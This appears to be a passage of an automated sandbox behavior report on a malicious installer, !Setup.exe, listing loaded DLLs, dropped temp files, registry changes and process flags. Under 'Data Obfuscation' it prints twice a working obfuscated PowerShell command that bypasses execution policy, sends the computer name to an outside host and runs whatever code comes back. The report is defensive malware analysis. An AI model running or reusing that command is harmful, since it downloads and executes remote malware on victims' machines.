Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\find.exe	Section loaded: ulib.dll
Source: C:\Windows\System32\find.exe	Section loaded: fsutilext.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\find.exe	Section loaded: ulib.dll
Source: C:\Windows\System32\find.exe	Section loaded: fsutilext.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\find.exe	Section loaded: ulib.dll
Source: C:\Windows\System32\find.exe	Section loaded: fsutilext.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\find.exe	Section loaded: ulib.dll
Source: C:\Windows\System32\find.exe	Section loaded: fsutilext.dll

Source: C:\Users\user\Desktop\!Setup.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist

Source: C:\Users\user\AppData\Local\Temp\is-DGUQE.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp

Window found: window name: TMainForm

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: !Setup.exe

Static file information: File size 73410647 > 1048576

Source: !Setup.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:

Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000010.00000002.2651074303.0000000007119000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Suspicious powershell command line found

Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content;
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content;			Jump to behavior

Source: C:\Users\user\Desktop\!Setup.exe

Code function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00406328

Source: 9G18T8ZC0J1TEEA21J35VVJ53B.tmp.18.dr	Static PE information: real checksum: 0x33908a should be: 0x33ab8c
Source: 9G18T8ZC0J1TEEA21J35VVJ53B.tmp.20.dr	Static PE information: real checksum: 0x33908a should be: 0x33ab8c

Source: 9G18T8ZC0J1TEEA21J35VVJ53B.exe.12.dr	Static PE information: section name: .didata
Source: 9G18T8ZC0J1TEEA21J35VVJ53B.tmp.18.dr	Static PE information: section name: .didata
Source: 9G18T8ZC0J1TEEA21J35VVJ53B.tmp.20.dr	Static PE information: section name: .didata

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 16_2_00CC11B0 push esp; retn 0000h		16_2_00CC11B9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 16_2_00CC0C1F push esi; retn 0000h		16_2_00CC0C2A

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Local\Temp\243714\Publisher.com

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\is-DGUQE.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	File created: C:\Users\user\AppData\Local\Temp\is-E1U3K.tmp\_isetup\_isdecmp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	File created: C:\Users\user\AppData\Local\Temp\is-GVMHV.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DGUQE.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	File created: C:\Users\user\AppData\Local\Temp\is-E1U3K.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	File created: C:\Users\user\AppData\Roaming\UltraMedia\is-7SMCJ.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File created: C:\Users\user\AppData\Local\Temp\9G18T8ZC0J1TEEA21J35VVJ53B.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	File created: C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	File created: C:\Users\user\AppData\Local\Temp\is-GVMHV.tmp\_isetup\_isdecmp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9G18T8ZC0J1TEEA21J35VVJ53B.exe	File created: C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9G18T8ZC0J1TEEA21J35VVJ53B.exe	File created: C:\Users\user\AppData\Local\Temp\is-DGUQE.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Jump to dropped file

Source: C:\Users\user\Desktop\!Setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9G18T8ZC0J1TEEA21J35VVJ53B.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DGUQE.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DGUQE.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DGUQE.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DGUQE.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DGUQE.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DGUQE.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DGUQE.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DGUQE.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9G18T8ZC0J1TEEA21J35VVJ53B.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
